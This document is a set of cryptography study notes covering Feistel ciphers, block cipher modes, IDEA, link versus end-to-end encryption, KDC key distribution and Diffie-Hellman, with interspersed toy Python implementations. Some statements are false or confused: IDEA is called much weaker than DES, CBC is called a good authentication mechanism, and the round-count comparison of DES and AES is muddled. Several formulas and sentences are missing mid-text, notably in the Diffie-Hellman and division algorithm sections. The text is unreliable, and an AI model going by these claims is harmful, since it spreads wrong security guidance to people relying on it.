before:

• substitution (S-box)

• permutation (P-box)

• provide confusion and diffusion of message

• diffusion – dissipates statistical structure of plaintext over bulk of ciphertext

• confusion – makes relationship between ciphertext and key as complex as possible

Feistel cipher structure

The inputs to the encryption algorithm are a plaintext block of length 2w bits and a key K.
The plaintext block is divided into two halves L0 and R0. The two halves of the data pass
through n rounds of processing and then combine to produce the ciphertext block. Each round i
has inputs Li-1 and Ri-1, derived from the previous round, as well as the subkey Ki, derived
from the overall key K. In general, the subkeys Ki are different from K and from each other.

All rounds have the same structure. A substitution is performed on the left half of the data
(similar to S-DES). This is done by applying a round function F to the right half of the data
and then taking the XOR of the output of that function and the left half of the data. The round
function has the same general structure for each round but is parameterized by the round
subkey Ki. Following this substitution, a permutation is performed that consists of the
interchange of the two halves of the data. This structure is a particular form of the substitution-
permutation network.

The exact realization of a Feistel network depends on the choice of the following
parameters and design features:

Block size - Increasing size improves security, but slows cipher

Key size - Increasing size improves security, makes exhaustive key searching harder, but
may slow cipher

Number of rounds - Increasing number improves security, but slows cipher

Subkey generation - Greater complexity can make analysis harder, but slows cipher

Round function - Greater complexity can make analysis harder, but slows cipher

Fast software en/decryption & ease of analysis - are more recent concerns for practical
use and testing.

The process of decryption is essentially the same as the encryption process. The rule is as
follows: use the ciphertext as input to the algorithm, but use the subkeys Ki in reverse order,
i.e., Kn in the first round, Kn-1 in the second round, and so on. For clarity, we use the notation
LEi and REi for data traveling through the encryption algorithm and LDi and RDi for data
traveling through the decryption algorithm. The diagram below indicates that, at each round,
the intermediate value of the decryption process is equal to the corresponding value of the
encryption process with the two halves of the value swapped,

i.e., REi || LEi (or) equivalently RD16-i || LD16-i

After the last iteration of the encryption process, the two halves of the output are swapped, so
that the ciphertext is RE16 || LE16. The output of that round is the ciphertext. Now take the
ciphertext and use it as input to the same algorithm. The input to the first round is RE16 ||
LE16, which is equal to the 32-bit swap of the output of the sixteenth round of the encryption
process.

Fig: Feistel Encryption & Decryption


Q5: Block Cipher Design Principles – Block Cipher Modes Of Operation
Block ciphers are built in the Feistel cipher structure. A block cipher has a specific number
of rounds and keys for generating ciphertext. For defining the complexity level of an
algorithm, a few design principles are to be considered.
These are explained below:
1. Number of Rounds –
The number of rounds is regularly considered in the design criteria; it reflects the
number of rounds needed for an algorithm to be suitably complex. In DES we have
16 rounds, ensuring it is more secure, while in AES we have 10 rounds, which makes
it more secure.
2. Design of function F –
The core part of the Feistel block cipher structure is the round function. The
complexity of cryptanalysis derives from the round function, i.e. increasing the
complexity of the round function greatly increases the complexity of cryptanalysis.
To increase the complexity of the round function, the avalanche effect is also built
into the round function: the change of a single bit in the plaintext produces a
drastically different output because of the avalanche effect.
3. Key schedule algorithm –
In the Feistel block cipher structure, each round uses a generated sub-key to
increase the complexity of cryptanalysis. The avalanche effect makes deriving the
sub-keys more complex. Decryption must be done very carefully to get the actual
output, as the avalanche effect is present in it.
Encryption algorithms are divided into two categories based on the input type, as a block
cipher and stream cipher. Block cipher is an encryption algorithm that takes a fixed size
of input say b bits and produces a ciphertext of b bits again. If the input is larger than b bits
it can be divided further. For different applications and uses, there are several modes of
operations for a block cipher.
Electronic Code Book (ECB) –
Electronic code book is the simplest block cipher mode of operation. It is simple because
each block of input plaintext is encrypted directly, and the output is the corresponding block
of ciphertext. Generally, if a message is larger than b bits in size, it is broken down into a
sequence of blocks and the procedure is repeated for each.
Procedure of ECB is illustrated below:

Advantages of using ECB –
• Parallel encryption of blocks is possible, so it is a faster way of encryption.
• The simplest way of using a block cipher.
Disadvantages of using ECB –
• Prone to cryptanalysis since there is a direct relationship between plaintext and
ciphertext.
Cipher Block Chaining –
Cipher block chaining or CBC is an advancement made on ECB since ECB compromises
some security requirements. In CBC, the previous cipher block is given as input to the next
encryption algorithm after XOR with the original plaintext block. In a nutshell here, a cipher
block is produced by encrypting an XOR output of the previous cipher block and present
plaintext block.

Advantages of CBC –
• CBC works well for input greater than b bits.
• CBC is a good authentication mechanism.
• Better resistance to cryptanalysis than ECB.
Disadvantages of CBC –
• Parallel encryption is not possible since every encryption requires the previous cipher
block.
The process is illustrated here:
Cipher Feedback Mode (CFB) –
In this mode the ciphertext is fed back into the next block encryption, with some new
specifics: first, an initialization vector IV is used for the first encryption, and the output bits
are divided into s bits and b-s bits. The leftmost s bits are XORed with s bits of plaintext.
The result is fed into a b-bit shift register (the existing contents shifted towards the left-hand
side, the new s bits entering on the right-hand side) and the process continues. The
encryption and decryption processes are shown below; both of them use the encryption
algorithm.
Advantages of CFB –
• Because the shift register discards part of each output, applying cryptanalysis is
more difficult.
Disadvantages of CFB –
• The drawbacks of CFB are the same as those of CBC mode. Neither block losses
nor concurrent encryption of several blocks is supported by the encryption.
Decryption, however, is parallelizable and loss-tolerant.

Output Feedback Mode –

The output feedback mode follows nearly the same process as the Cipher Feedback mode,
except that it feeds back the encrypted output instead of the actual ciphertext (the XOR
output). In this output feedback mode, all bits of the block are fed back instead of only the
selected s bits. The Output Feedback mode of a block cipher holds great resistance towards
bit transmission errors. It also decreases the dependency or relationship of the ciphertext on
the plaintext.

Advantages of OFB –
• In the case of CFB, a single bit error in a block is propagated to all subsequent
blocks. This problem is solved by OFB as it is free from bit errors in the plaintext
block.
Disadvantages of OFB –
• The drawback of OFB is that, because of its mode of operation, it is more
susceptible to a message stream modification attack than CFB.
Counter Mode –
The Counter Mode or CTR is a simple counter-based block cipher implementation. Each
time, a counter value is encrypted and the result is XORed with the plaintext block, which
gives the ciphertext block. The CTR mode does not depend on feedback and thus can be
implemented in parallel.
Its simple implementation is shown below:

Advantages of Counter –
• Since there is a different counter value for each block, the direct plaintext and
ciphertext relationship is avoided. This means that the same plaintext can map
to different ciphertext.
• Parallel execution of encryption is possible as outputs from previous stages are
not chained as in the case of CBC.
Disadvantages of Counter –
• The fact that CTR mode requires a synchronous counter at both the transmitter
and the receiver is a severe drawback. The recovery of plaintext is erroneous
when synchronisation is lost.
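The Feistel structure, the two-key E-D-E construction and the ECB, CBC and CTR modes described above, worked through in one added example (not code from these notes, and not DES): a toy 64-bit Feistel cipher whose key schedule and round function are constructed here for illustration only, decryption as the same network with the subkeys reversed, E-D-E collapsing to a single encryption when K1 = K2, and the three modes built on that block cipher.

```python
import hashlib

BLOCK = 8       # 64-bit block, handled as two 32-bit halves
ROUNDS = 16     # same round count as DES


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def subkeys(key: bytes, rounds: int = ROUNDS) -> list:
    # Toy key schedule (constructed for this example, not DES's): one 32-bit
    # subkey K_i per round, derived from the master key K.
    return [hashlib.sha256(key + bytes([i])).digest()[:4] for i in range(rounds)]


def round_function(right: bytes, subkey: bytes) -> bytes:
    # Toy round function F (constructed): keyed mixing of the right half.
    # F need not be invertible; the Feistel structure supplies the inverse.
    return hashlib.sha256(right + subkey).digest()[:4]


def feistel(block: bytes, ks: list) -> bytes:
    # Round i: L_i = R_{i-1};  R_i = L_{i-1} XOR F(R_{i-1}, K_i).
    # The final swap makes decryption the same network with reversed subkeys.
    left, right = block[:4], block[4:]
    for k in ks:
        left, right = right, xor(left, round_function(right, k))
    return right + left


def encrypt_block(key: bytes, block: bytes) -> bytes:
    return feistel(block, subkeys(key))


def decrypt_block(key: bytes, block: bytes) -> bytes:
    # Same algorithm, subkeys applied as K_n ... K_1.
    return feistel(block, subkeys(key)[::-1])


def ede_encrypt(k1: bytes, k2: bytes, block: bytes) -> bytes:
    # Two-key E-D-E: C = E_K1(D_K2(E_K1(P))). With K1 == K2 the middle D
    # undoes the first E and the result is a single encryption under K1.
    return encrypt_block(k1, decrypt_block(k2, encrypt_block(k1, block)))


def ede_decrypt(k1: bytes, k2: bytes, block: bytes) -> bytes:
    return decrypt_block(k1, encrypt_block(k2, decrypt_block(k1, block)))


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, pt: bytes) -> bytes:
    # Each block encrypted independently (input must be block-aligned).
    return b"".join(encrypt_block(key, b) for b in blocks(pt))


def ecb_decrypt(key: bytes, ct: bytes) -> bytes:
    return b"".join(decrypt_block(key, b) for b in blocks(ct))


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    # C_i = E(P_i XOR C_{i-1}) with C_0 = IV: encryption cannot be parallelized.
    out, prev = [], iv
    for b in blocks(pt):
        prev = encrypt_block(key, xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    # P_i = D(C_i) XOR C_{i-1}: each block needs only the previous ciphertext.
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    # Keystream block = E(nonce || counter), XORed with the data. The same
    # call encrypts and decrypts, blocks are independent, and the last block
    # may be shorter than BLOCK (xor truncates the keystream to fit).
    out = []
    for i, b in enumerate(blocks(data)):
        counter_block = nonce + i.to_bytes(4, "big")   # 4-byte nonce + 4-byte counter
        out.append(xor(b, encrypt_block(key, counter_block)))
    return b"".join(out)


def repeated_blocks(ct: bytes) -> int:
    # Ciphertext blocks that duplicate an earlier one: ECB leaks plaintext
    # repetition this way, CBC and CTR do not.
    bs = blocks(ct)
    return len(bs) - len(set(bs))
```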

Q6: IDEA – Security issues involved with these methods


IDEA stands for International Data Encryption Algorithm. IDEA is a block cipher invented by
James Massey and Xuejia Lai and was first defined in 1991. It uses a 128-bit key and works
on 64-bit blocks.
It consists of a series of eight identical transformations based on bitwise exclusive-OR,
addition and multiplication operations. It is a symmetric cipher and has a very weak key
design approach; therefore the security level of the algorithm is very poor as compared to
DES. IDEA did not become very popular because of its complex structure.

4. CONFIDENTIALITY USING CONVENTIONAL ENCRYPTION

Q1: PLACEMENT OF ENCRYPTION:


If encryption is to be used to counter attacks on confidentiality, we need to decide
what to encrypt and where the encryption function should be located. To begin, this section
examines the potential locations of security attacks and then looks at the two major
approaches to encryption placement: link and end to end.
There are a large number of locations at which an attack can occur. Furthermore, for
wide area communications, many of these locations are not under the physical control of the
end user. Even in the case of local area networks, in which physical security measures are
possible, there is always the threat of the disgruntled employee.
Link versus End-to-End Encryption
The most powerful and most common approach to securing the points of vulnerability
highlighted in the preceding section is encryption. If encryption is to be used to counter these
attacks, then we need to decide what to encrypt and where the encryption gear should be
located. There are two fundamental alternatives: link encryption and end-to-end encryption.

Basic Approaches
Link to Link Encryption:
With link encryption, each vulnerable communications link is
equipped on both ends with an encryption device. Thus, all traffic over all communications
links is secured. One of its disadvantages is that the message must be decrypted each time
it enters a switch because the switch must read the address (logical connection number) in
the packet header in order to route the frame. Thus, the message is vulnerable at each
switch. If working with a public network, the user has no control over the security of the
nodes.
Several implications of link encryption should be noted. For this
strategy to be effective, all the potential links in a path from source to destination must use
link encryption. Each pair of nodes that share a link should share a unique key, with a
different key used on each link. Thus, many keys must be provided.
End-To-End Encryption
With end-to-end encryption, the encryption process is carried out
at the two end systems. The source host or terminal encrypts the data. The data in
encrypted form are then transmitted unaltered across the network to the destination terminal
or host. The destination shares a key with the source and so is able to decrypt the data. This
plan seems to secure the transmission against attacks on the network links or switches.
Thus, end-to-end encryption relieves the end user of concerns about the degree of security
of networks and links that support the communication. There is, however, still a weak spot.
Consider the following situation. A host connects to a frame relay
or ATM network, sets up a logical connection to another host, and is prepared to transfer
data to that other host by using end-to-end encryption. Data are transmitted over such a
network in the form of packets that consist of a header and some user data. What part of
each packet will the host encrypt? Suppose that the host encrypts the entire packet,
including the header. This will not work because, remember, only the other host can perform
the decryption. The frame relay or ATM switch will receive an encrypted packet and be
unable to read the header. Therefore, it will not be able to route the packet. It follows that the
host may encrypt only the user data portion of the packet and must leave the header in the
clear.
Thus, with end-to-end encryption, the user data are secure.
However, the traffic pattern is not, because packet headers are transmitted in the clear. On
the other hand, end-to-end encryption does provide a degree of authentication. If two end
systems share an encryption key, then a recipient is assured that any message that it
receives comes from the alleged sender, because only that sender shares the relevant key.
Such authentication is not inherent in a link encryption scheme.
To achieve greater security, both link and end-to-end encryption
are needed, as is shown in Figure 7.2. When both forms of encryption are employed, the
host encrypts the user data portion of a packet using an end-to-end encryption key. The
entire packet is then encrypted using a link encryption key. As the packet traverses the
network, each switch decrypts the packet, using a link encryption key to read the header,
and then encrypts the entire packet again for sending it out on the next link. Now the entire
packet is secure except for the time that the packet is actually in the memory of a packet
switch, at which time the packet header is in the clear.
Logical Placement of End-to-End Encryption Function
With link encryption, the encryption function is performed at a low
level of the communications hierarchy i.e. physical or link layers.
For end-to-end encryption, several choices are possible for the
logical placement of the encryption function. At the lowest practical level, the encryption
function could be performed at the network layer.
With network-layer encryption, each end system can engage in an
encrypted exchange with another end system if the two share a secret key. All the user
processes and applications within each end system would employ the same encryption
scheme with the same key to reach a particular target end system.
Figure 7.4 illustrates the issues involved. In this example, an
electronic mail gateway is used to interconnect an internetwork that uses a TCP/IP-based
architecture. In such a configuration, there is no end-to-end protocol below the application
layer. The transport and network connections from each end system terminate at the mail
gateway, which sets up new transport and network connections to link to the other end
system. Even if both end systems use TCP/IP or OSI, there are plenty of instances in actual
configurations in which mail gateways sit between otherwise isolated internetworks. Thus,
for applications like electronic mail that have a store-and-forward capability, the only place to
achieve end-to-end encryption is at the application layer.
A drawback of application-layer encryption is that the number of entities to consider
increases dramatically. A network that supports hundreds of hosts may support thousands of
users and processes. Thus, many more secret keys need to be generated and distributed.
An interesting way of viewing the alternatives is to note that as we move up the
communications hierarchy, less information is encrypted but it is more secure.
With application-level encryption (Figure 7.5a), only the user data
portion of a TCP segment is encrypted. The TCP, IP, network-level, and link-level headers
and link-level trailer are in the clear. By contrast, if encryption is performed at the TCP level
(Figure 7.5b), then, on a single end-to-end connection, the user data and the TCP header
are encrypted. The IP header remains in the clear because it is needed by routers to route
the IP datagram from source to destination.
Note, however, that if a message passes through a gateway, the
TCP connection is terminated and a new transport connection is opened for the next hop.
Furthermore, the gateway is treated as a destination by the underlying IP. Thus, the
encrypted portions of the data unit are decrypted at the gateway. If the next hop is over a
TCP/IP network, then the user data and TCP header are encrypted again before
transmission. However, in the gateway itself the data unit is buffered entirely in the clear.
Finally, for link-level encryption (Figure 7.5c), the entire data unit except for the link header
and trailer is encrypted on each link, but the entire data unit is in the clear at each router and
gateway.

Q2: Traffic Confidentiality:


The following types of information can be derived from a traffic analysis attack:
• Identities of partners
• How frequently the partners are communicating
• Message pattern, message length, or quantity of messages that suggest important
information is being exchanged
• The events that correlate with special conversations between particular partners
Another concern related to traffic is the use of traffic patterns to
create a covert channel. Typically, the channel is used to transfer information in a way that
violates a security policy. For example, an employee may wish to communicate information
to an outsider in a way that is not detected by management and that requires simple
eavesdropping on the part of the outsider.
Link Encryption Approach
With the use of link encryption, network-layer headers (e.g., frame
or cell header) are encrypted, reducing the opportunity for traffic analysis. However, it is still
possible in those circumstances for an attacker to assess the amount of traffic on a network
and to observe the amount of traffic entering and leaving each end system. An effective
countermeasure to this attack is traffic padding, illustrated in Figure 7.6.
Traffic padding produces ciphertext output continuously, even in
the absence of plaintext. A continuous random data stream is generated. When plaintext is
available, it is encrypted and transmitted. When input plaintext is not present, random data
are encrypted and transmitted. This makes it impossible for an attacker to distinguish
between true data flow and padding and therefore impossible to deduce the amount of
traffic.
End-to-End Encryption Approach
Traffic padding is essentially a link encryption function. If only end-
to-end encryption is employed, then the measures available to the defender are more
limited. For example, if encryption is implemented at the application layer, then an opponent
can determine which transport entities are engaged in dialogue.
One technique that might prove useful is to pad out data units to a
uniform length at either the transport or application level. In addition, null messages can be
inserted randomly into the stream. These tactics deny an opponent knowledge about the
amount of data exchanged between end users and obscure the underlying traffic pattern.
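Padding data units to a uniform length and inserting null messages, as an added example (not from the notes): a constructed unit format (type byte, length, payload, random fill to a fixed 64-byte size) in which the receiver can tell real and null units apart while an observer of the stream sees only equal-sized units. The end-to-end encryption that would cover each unit is assumed to be applied outside this code.

```python
import os
import struct
from typing import List, Optional

UNIT = 64                    # fixed size of every unit on the wire (constructed)
HDR = struct.Struct("!BH")   # type (0 = null, 1 = data) and payload length
MAX_PAYLOAD = UNIT - HDR.size


def make_unit(msg: Optional[bytes]) -> bytes:
    # One fixed-size unit. A real message gets type 1 and its length; a null
    # message gets type 0. The rest is random fill, so both kinds have the
    # same size and, once encrypted, the same appearance on the wire.
    if msg is None:
        kind, body = 0, b""
    else:
        if len(msg) > MAX_PAYLOAD:
            raise ValueError("message too long for one unit")
        kind, body = 1, msg
    fill = os.urandom(MAX_PAYLOAD - len(body))
    return HDR.pack(kind, len(body)) + body + fill


def parse_unit(unit: bytes) -> Optional[bytes]:
    # The receiver, after decryption, reads the header and discards nulls.
    if len(unit) != UNIT:
        raise ValueError("malformed unit")
    kind, n = HDR.unpack_from(unit)
    if kind == 0:
        return None
    if kind != 1 or n > MAX_PAYLOAD:
        raise ValueError("malformed unit")
    return unit[HDR.size:HDR.size + n]


def send_stream(msgs: List[bytes], null_every: int = 2) -> List[bytes]:
    # Real messages padded to UNIT, with a null unit inserted after every
    # null_every-th message (a fixed pattern here for reproducibility; random
    # insertion as the notes suggest uses the same unit format).
    units = []
    for i, m in enumerate(msgs):
        units.append(make_unit(m))
        if i % null_every == 0:
            units.append(make_unit(None))
    return units


def observed_sizes(units: List[bytes]) -> set:
    # All an observer of the (encrypted) stream can measure: unit sizes.
    return {len(u) for u in units}


def receive_stream(units: List[bytes]) -> List[bytes]:
    return [m for m in map(parse_unit, units) if m is not None]
```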

Q3: Key Distribution :


For symmetric encryption to work, the two parties to an exchange must share the same key,
and that key must be protected from access by others. Furthermore, frequent key changes are
usually desirable to limit the amount of data compromised if an attacker learns the key.
Therefore, the term key distribution refers to the means of delivering a key to two parties who
wish to exchange data, without allowing others to see the key. For two parties A and B, key
distribution can be achieved in a number of ways, as follows:

1. A can select a key and physically deliver it to B.

2. A third party can select the key and physically deliver it to A and B.

3. If A and B have previously and recently used a key, one party can
transmit the new key to the other, encrypted using the old key.

4. If A and B each has an encrypted connection to a third party C, C can
deliver a key on the encrypted links to A and B.

Physical delivery (1 & 2) is simplest, but only applicable when there is personal contact
between recipient and key issuer. This is fine for link encryption, where devices & keys occur
in pairs, but does not scale as the number of parties who wish to communicate grows. Option 3
mostly relies on 1 or 2 having occurred first.
A third party, whom all parties trust, can be used as a trusted intermediary to mediate the
establishment of secure communications between them (4). One must trust the intermediary
not to abuse the knowledge of all session keys. As the number of parties grows, some variant
of 4 is the only practical solution to the huge growth in the number of keys potentially needed.

Key distribution centre:

• The use of a key distribution center (KDC) is based on the use of a hierarchy of keys. At a
minimum, two levels of keys are used.
• Communication between end systems is encrypted using a temporary key, often referred to
as a session key.
• Typically, the session key is used for the duration of a logical connection and then discarded.
• A master key is shared by the key distribution center and an end system or user and is used
to encrypt the session key.

Let us assume that user A wishes to establish a logical connection with B and requires a
one-time session key to protect the data transmitted over the connection. A has a master key,
Ka, known only to itself and the KDC; similarly, B shares the master key Kb with the KDC.
The following steps occur:
❖ A issues a request to the KDC for a session key to protect a logical connection to B.
The message includes the identity of A and B and a unique identifier, N1, for this
transaction, which we refer to as a nonce. The nonce may be a timestamp, a counter,
or a random number; the minimum requirement is that it differs with each request.
Also, to prevent masquerade, it should be difficult for an opponent to guess the
nonce. Thus, a random number is a good choice for a nonce.

❖ The KDC responds with a message encrypted using Ka. Thus, A is the only one who
can successfully read the message, and A knows that it originated at the KDC. The
message includes two items intended for A:
• The one-time session key, Ks, to be used for the session
• The original request message, including the nonce, to enable A to match this response
with the appropriate request
Thus, A can verify that its original request was not altered before
reception by the KDC and, because of the nonce, that this is not a replay of some previous
request.
In addition, the message includes two items intended for B:
• The one-time session key, Ks to be used for the session
• An identifier of A (e.g., its network address), IDA
These last two items are encrypted with Kb (the master key that the KDC shares with B).
They are to be sent to B to establish the connection and prove A's identity.

❖ A stores the session key for use in the upcoming session and forwards to B the
information that originated at the KDC for B, namely, E(Kb, [Ks || IDA]). Because this
information is encrypted with Kb, it is protected from eavesdropping. B now knows
the session key (Ks), knows that the other party is A (from IDA), and knows that the
information originated at the KDC (because it is encrypted using Kb).
At this point, a session key has been securely delivered to A and B, and they may begin their
protected exchange. However, two additional steps are desirable:
❖ Using the newly minted session key for encryption, B sends a nonce, N2, to A.
❖ Also using Ks , A responds with f(N2), where f is a function that performs some
transformation on N2 (e.g., adding one).
These steps assure B that the original message it received (step 3) was not a replay.
Note that the actual key distribution involves only steps 1 through 3 but that steps 4 and 5,
as well as 3, perform an authentication function.
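The five steps above, run end to end as an added example (not code from the notes): a KDC holding Ka and Kb, the request carrying nonce N1, the reply under Ka with Ks, the echoed request and the ticket E(Kb, [Ks || IDA]), and the N2 / f(N2) = N2 + 1 handshake under Ks. E and D are a constructed stand-in (SHA-256 keystream plus an HMAC tag so tampering or a wrong key is detected), not a real cipher; identifiers, key sizes and the JSON packing are assumptions.

```python
import hashlib
import hmac
import json
import os
from typing import Tuple

TAG = 32   # HMAC-SHA256 tag length


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(n // 32 + 1))


def E(key: bytes, msg: bytes) -> bytes:
    # Stand-in for the notes' E(K, M): XOR with a keyed stream, then a tag
    # over nonce || ciphertext. Constructed for this example only.
    nonce = os.urandom(16)
    ct = bytes(m ^ k for m, k in zip(msg, _keystream(key, nonce, len(msg))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def D(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-TAG], blob[-TAG:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered message")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def pack(*fields) -> bytes:
    # Concatenation "||" from the notes, done as JSON with bytes hex-encoded.
    return json.dumps([f.hex() if isinstance(f, bytes) else f for f in fields]).encode()


def unpack(data: bytes) -> list:
    return json.loads(data)


class KDC:
    def __init__(self, master_keys: dict):
        self.master = master_keys   # identity -> master key shared with the KDC

    def request(self, ida: str, idb: str, n1: bytes) -> bytes:
        # Step 2: E(Ka, [Ks || request || E(Kb, [Ks || IDA])]). The echoed
        # request (with N1) lets A match this reply to what it sent.
        ks = os.urandom(16)
        ticket_for_b = E(self.master[idb], pack(ks, ida))
        return E(self.master[ida], pack(ks, pack(ida, idb, n1), ticket_for_b))


def run_protocol(ka: bytes, kb: bytes) -> Tuple[bytes, bytes, bool]:
    kdc = KDC({"A": ka, "B": kb})
    # Step 1: A -> KDC: IDA || IDB || N1 (a random nonce, as the notes advise)
    n1 = os.urandom(16)
    reply = kdc.request("A", "B", n1)
    # A reads the reply with Ka and checks the echoed request; a mismatch
    # means the reply was altered or is a replay of an older one.
    ks_hex, echoed_hex, ticket_hex = unpack(D(ka, reply))
    if unpack(bytes.fromhex(echoed_hex)) != ["A", "B", n1.hex()]:
        raise ValueError("reply does not match request")
    ks_a = bytes.fromhex(ks_hex)
    # Step 3: A -> B: E(Kb, [Ks || IDA]); only B (and the KDC) can open it.
    ks_b_hex, ida = unpack(D(kb, bytes.fromhex(ticket_hex)))
    ks_b = bytes.fromhex(ks_b_hex)
    # Step 4: B -> A: E(Ks, N2)
    n2 = int.from_bytes(os.urandom(8), "big")
    challenge = E(ks_b, str(n2).encode())
    # Step 5: A -> B: E(Ks, f(N2)) with f(x) = x + 1
    response = E(ks_a, str(int(D(ks_a, challenge).decode()) + 1).encode())
    # B accepts only if the response proves A holds Ks: step 3 was not a replay.
    b_accepts = ida == "A" and int(D(ks_b, response).decode()) == n2 + 1
    return ks_a, ks_b, b_accepts
```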
Major Issues with KDC:
For very large networks, a hierarchy of KDCs can be established.
For communication among entities within the same local domain, the local KDC is
responsible for key distribution. If two entities in different domains desire a shared key, then
the corresponding local KDCs can communicate through a (hierarchy of) global KDC(s)
To balance security & effort, a new session key should be used for
each new connection-oriented session. For a connectionless protocol, a new session key is
used for a certain fixed period only or for a certain number of transactions.
An automated key distribution approach provides the flexibility and
dynamic characteristics needed to allow a number of terminal users to access a number of
hosts and for the hosts to exchange data with each other, provided they trust the system to
act on their behalf.
The use of a key distribution center imposes the requirement that
the KDC be trusted and be protected from subversion. This requirement can be avoided if
key distribution is fully decentralized.
In addition to separating master keys from session keys, one may wish
to define different types of session keys on the basis of use.

Q4: Random Number Generation:


The generation of random numbers is essential to cryptography. One of the most difficult aspects
of cryptographic algorithms is depending on, or generating, truly random information. This is
problematic, since there is no known way to produce truly random data, and most especially no
way to do so on a finite state machine such as a computer.
There are generally two kinds of random number generators: non-deterministic random number
generators, sometimes called "true random number generators" (TRNG), and deterministic
random number generators, also called pseudorandom number generators (PRNG).
Many high-quality cryptosystems use both: a hardware random-number generator to
periodically re-seed a deterministic random number generator.
Quantum mechanical theory suggests that some physical processes are inherently random
(though collecting and using such data presents problems), but deterministic mechanisms, such
as computers, cannot be. Any stochastic process (generation of random numbers) simulated on
a computer, however, is not truly random, but only pseudorandom.
Within the limitations of pseudorandom generators, any quality pseudorandom number generator
must:

• have a uniform distribution of values, in all dimensions
• have no detectable pattern, i.e. generate numbers with no correlations between
successive numbers
• have a very long cycle length
• have no, or easily avoidable, weak initial conditions which produce patterns or short
cycles

Q5: Diffie – Hellman Key Exchange


The purpose of the algorithm is to enable two users to exchange a key securely that can
then be used for subsequent encryption of messages.

The Diffie-Hellman algorithm depends for its effectiveness on the difficulty of computing
The result is that two sides have exchanged a secret key.

The security of the algorithm lies in the fact that, while it is relatively easy to calculate
exponentials modulo a prime, it is very difficult to calculate discrete logarithms. For large
primes, the latter task is considered infeasible.
Diffie-Hellman Key Exchange
The protocol depicted in figure is insecure against a man-in-the-middle attack. Suppose
Alice and Bob wish to exchange keys, and Darth is the adversary. The attack proceeds as
follows:

simply wants to eavesdrop on the communication without altering it.

In the second case, Darth wants to modify the message going to Bob. The key exchange
protocol is vulnerable to such an attack because it does not authenticate the participants.
This vulnerability can be overcome with the use of digital signatures and public-key
certificates.
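The exchange and the man-in-the-middle scenario above, as an added example (not the notes' own code): honest key agreement, the substituted public values that leave Alice and Bob with different keys each shared with Darth, and a brute-force discrete logarithm that is feasible only for toy sizes, the asymmetry the scheme rests on. The group parameters are constructed here and are far too small for real use.

```python
import secrets

# Toy group parameters, constructed for this example: p is the Mersenne
# prime 2^127 - 1 and g = 3. Real deployments use a standardized group with
# a prime of at least 2048 bits.
P = 2 ** 127 - 1
G = 3


def keypair(p: int = P, g: int = G):
    # Private value X in [1, p-2]; public value Y = g^X mod p, cheap via pow().
    x = secrets.randbelow(p - 2) + 1
    return x, pow(g, x, p)


def shared_secret(private: int, peer_public: int, p: int = P) -> int:
    # K = (peer's Y)^(own X) mod p; both sides obtain g^(XA * XB) mod p.
    return pow(peer_public, private, p)


def honest_exchange():
    xa, ya = keypair()
    xb, yb = keypair()
    # Alice receives YB, Bob receives YA; the Y values cross the wire in the clear.
    return shared_secret(xa, yb), shared_secret(xb, ya)


def mitm_exchange():
    # Darth intercepts YA and YB and forwards his own YD to each side. Each
    # side now holds a key shared with Darth rather than with its peer, and
    # nothing in the exchange reveals this: YA and YB are bound to no identity,
    # which is why signatures or certificates are needed on top.
    xa, ya = keypair()
    xb, yb = keypair()
    xd, yd = keypair()
    k_alice = shared_secret(xa, yd)          # Alice believes YD came from Bob
    k_bob = shared_secret(xb, yd)            # Bob believes YD came from Alice
    k_darth_with_alice = shared_secret(xd, ya)
    k_darth_with_bob = shared_secret(xd, yb)
    return k_alice, k_bob, k_darth_with_alice, k_darth_with_bob


def brute_force_log(y: int, g: int, p: int) -> int:
    # Discrete logarithm by exhaustive search: tries up to p-1 exponents, so
    # it is only feasible for toy p, while pow() stays cheap at any size.
    acc = 1
    for x in range(p - 1):
        if acc == y:
            return x
        acc = acc * g % p
    raise ValueError("no logarithm found")
```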

5. INTRODUCTION TO NUMBER THEORY

Q1: DIVISIBILITY AND THE DIVISION ALGORITHM (Refer Notes)


Divisibility
We say that a nonzero b divides a if a = mb for some m, where a, b, and m are integers.
That is, b divides a if there is no remainder on division. The notation b | a is
commonly used to mean b divides a. Also, if b | a, we say that b is a divisor of a.

Subsequently, we will need some simple properties of divisibility for integers, which are as
follows:
The Division Algorithm
Given any positive integer n and any nonnegative integer a, if we divide a by n, we get an
integer quotient q and an integer remainder r that obey the following relationship:

where ⌊x⌋ is the largest integer less than or equal to x. Equation (4.1) is referred to as the division
algorithm.
Figure 4.1a demonstrates that, given a and positive n, it is always possible to find q and r
that satisfy the preceding relationship. Represent the integers on the number line; a will fall
somewhere on that line (positive a is shown; a similar demonstration can be made for negative
a). Starting at 0, proceed to n, 2n, up to qn, such that qn ≤ a and (q + 1)n > a. The distance
from qn to a is r, and we have found the unique values of q and r. The remainder r is often
referred to as a residue.
Q2: The Euclidean Algorithm & Extended Euclidean Algorithm (Refer Notes)

Q3: Modular Arithmetic (Refer Notes)

Q4: Prime No.s (Refer Notes)

Q5: Fermet’s & Euler’s Theorem (Refer Notes)

Q6: Testing for Primality (Refer Notes)

Q7: The Chinese Remainder Theorem (Refer Notes)


6. PUBLIC KEY CRYPTOGRAPHY

Q1: Principles of Public-key Cryptosystems:

Public key Cryptosystem − Asymmetric algorithms depend on one key for encryption and
a distinct but related key for decryption. These algorithms have the following characteristics −
• It is computationally infeasible to determine the decryption key given only
knowledge of the cryptographic algorithm and the encryption key.
• There are two related keys such that one can be used for encryption, with the
other used for decryption.
A public key encryption scheme has the following ingredients −
• Plaintext − This is the readable message or data that is fed into the
algorithm as input.
• Encryption algorithm − The encryption algorithm performs various transformations
on the plaintext.
